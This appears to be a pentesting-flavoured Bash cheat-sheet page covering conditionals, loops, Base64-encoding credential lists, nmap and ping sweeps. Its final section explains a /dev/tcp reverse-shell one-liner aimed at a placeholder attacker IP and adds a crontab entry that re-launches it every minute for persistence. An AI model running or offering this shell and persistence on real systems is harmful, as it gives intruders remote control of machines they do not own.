====== Bash ======
All your happy shiny bash scripts must start with a shebang:
#!/bin/bash
----
===== Conditional Statements =====
How-To: https://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO-6.html
**Basic Structure:**
#!/bin/bash
if [ "foo" = "foo" ]; then
    echo expression evaluated as true
else
    echo expression evaluated as false
fi
**Example:**
#!/bin/bash
echo "Enter username: "
read -r un            # -r keeps backslashes in the input literal
echo "Enter password: "
read -r pw
if [[ "$un" = "admin" && "$pw" = "superuser" ]]; then
    echo "Login Successful"
fi
**NOTE: The == operator is non-standard**
* Bash allows ''=='' to be used for equality with ''['', but this is not standard (POSIX ''test'' only defines ''='').
* See: [[ https://stackoverflow.com/questions/2237080/how-to-compare-strings-in-bash/2237103 | Compare Strings in Bash]]
* Use either the first form, the bash-only ''[[ ]]'', inside which the quotes around $x are optional because no word splitting is done:
if [[ "$x" == "valid" ]]; then
* or the second, POSIX form, where the quotes are required:
if [ "$x" = "valid" ]; then
----
===== For Loop One-Liners =====
**Run a command 5 times:**
for i in {1..5}; do COMMAND-HERE; done            # runs the command 5 times
for (( c=1; c<=5; c++ )); do COMMAND-HERE; done   # same as above, C-style loop
for i in {0..10..2}; do COMMAND-HERE; done        # brace range with a step: i = 0, 2, 4, ... 10
Or...
for((i=1;i<=10;i+=2)); do echo "Welcome $i times"; done
**Work On Files:**
# General (quote "$i" so names with spaces are passed as one argument)
for i in *; do echo "$i"; done
# To encode multiple username:password combos in a text file to Base64, one per line
for cred in $(cat tomcat.txt); do echo -n "$cred" | base64; done
# Same as above, but appended to a text file
for cred in $(cat tomcat.txt); do echo -n "$cred" | base64 >> tomcat_base64.txt; done
# NOTE: The -n on the echo is necessary so the trailing newline character is NOT sent to the encoder
# NOTE: $(cat file) splits on whitespace, so this only works when each entry contains no spaces
Or...
for i in /etc/*.conf; do cp "$i" /backup; done
**Loop over a host list, e.g. my iplist.txt (one IP per line):**
for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 "$ip"; done
Or, backgrounding each scan with ''&'' so they run in parallel...
for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 "$ip" & done
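The ''$(cat file)'' loops above break on entries that contain spaces, because the shell word-splits the command substitution. As an added example (not code from the original page), the same Base64-per-line job written with a ''while read'' loop over a constructed sample file, which keeps each line intact and uses ''printf'' in place of ''echo -n'':

```bash
#!/bin/bash
# Added example (not from the original page): Base64-encode "user:pass"
# lines from a file, one line at a time. Reading with `while read` instead
# of `for x in $(cat file)` keeps lines with spaces or glob characters
# intact, and printf '%s' avoids both the trailing newline and the risk of
# a line such as "-e..." being parsed as an option by echo.

# encode_creds_file FILE  -> one Base64 line per non-empty input line
encode_creds_file() {
    file="$1"
    # the `|| [ -n "$line" ]` also handles a file without a final newline
    while IFS= read -r line || [ -n "$line" ]; do
        if [ -n "$line" ]; then
            printf '%s' "$line" | base64
        fi
    done < "$file"
}

# Same, but appended to an output file (the >> form above).
encode_creds_file_to() {
    encode_creds_file "$1" >> "$2"
}

# Constructed sample input (hypothetical credentials, not real data):
# a blank line and a line containing spaces are included on purpose.
make_sample_file() {
    tmp=$(mktemp) || return 1
    printf '%s\n' 'admin:superuser' '' 'svc account:p@ss word' > "$tmp"
    printf '%s\n' "$tmp"
}

# Usage: prints YWRtaW46c3VwZXJ1c2Vy followed by the encoding of the third line.
sample=$(make_sample_file)
encode_creds_file "$sample"
rm -f "$sample"
```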
----
===== Ping Sweep =====
Simple sweep of a network for a quick look at what machines are out there (and respond):
for i in {1..254}
do
    ping -w 5 -c 1 192.168.0.$i | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
wait # with no arguments, waits for all background jobs to finish
Note the ''&'' at the end of the ping line: every ping runs in the background instead of one after another, which speeds the sweep up a lot.
----
===== Reverse Shell One-Liner =====
/bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'
From the [[https://linux.die.net/man/1/bash | Bash manpage]]:
* **-c //string//**: commands are read from string.
* **>&** (same as **&>**) : redirect both standard output (fd 1) and standard error (fd 2); equivalent to **> file 2>&1**
* Here, **&>** sends the standard output (fd 1) and standard error (fd 2) of the interactive bash to the TCP socket bash opens to the specified IP and port, where the listener is waiting.
* **0>&1** : redirect standard input (fd 0) to the same place as standard output (fd 1).
* Literally, '0' (standard input) is attached to wherever '1' (standard output) already points.
* Therefore stdin (fd 0) goes to the same socket as stdout (fd 1), and from **&>** above we know that socket belongs to the listener, so whoever is on the listening port can both read this bash process's output and feed it input.
**__For persistence on a target__:** Include this one-liner in a crontab entry (i.e., a cronjob) that executes every minute of every day, etc.
echo "* * * * * /bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'" > gk_cron_job
crontab -i gk_cron_job
crontab -l # list user's crontab and verify
Set up a listener on the attack machine (''nc -nvlp [port#]'') and it should connect within 1 minute.
----